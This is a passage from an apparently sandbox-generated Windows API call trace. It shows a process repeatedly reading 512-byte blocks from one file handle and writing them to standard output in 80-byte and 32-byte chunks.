hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.965] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.965] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] GetFileType (hFile=0x50) returned 0x1 [0132.965] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.965] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.966] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.966] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] GetFileType (hFile=0x50) returned 0x1 [0132.966] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.966] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.967] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.967] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] GetFileType (hFile=0x50) returned 0x1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.967] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] GetFileType (hFile=0x50) returned 0x1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] GetFileType (hFile=0x50) returned 0x1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] GetFileType (hFile=0x50) returned 0x1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] GetFileType (hFile=0x50) returned 0x1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] GetFileType (hFile=0x50) returned 0x1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] GetFileType (hFile=0x50) returned 0x1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.968] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.968] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.968] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.969] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.969] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.969] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] GetFileType (hFile=0x50) returned 0x1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.970] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.970] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.970] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12ee84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee84*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] GetFileType (hFile=0x50) returned 0x1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.971] WriteFile (in: hFile=0x50, lpBuffer=0x12eed4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12eed4*, lpNumberOfBytesWritten=0x12ded8*=0x20, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.971] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dec4 | out: lpNewFilePointer=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0132.971] ReadFile (in: hFile=0x58, lpBuffer=0x12ecf4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dee4, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesRead=0x12dee4*=0x200, lpOverlapped=0x0) returned 1 [0132.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12ecf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ecf4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12ed44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed44*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12ed94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12ede4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ede4*, lpNumberOfBytesWritten=0x12ded8*=0x50, lpOverlapped=0x0) returned 1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] GetFileType (hFile=0x50) returned 0x1 [0132.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0132.972] WriteFile (in: hFile=0x50, lpBuffer=0x12ee34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12ded8, lpOverlapped=0x0 | out: lpBuffer=0x12ee34*, 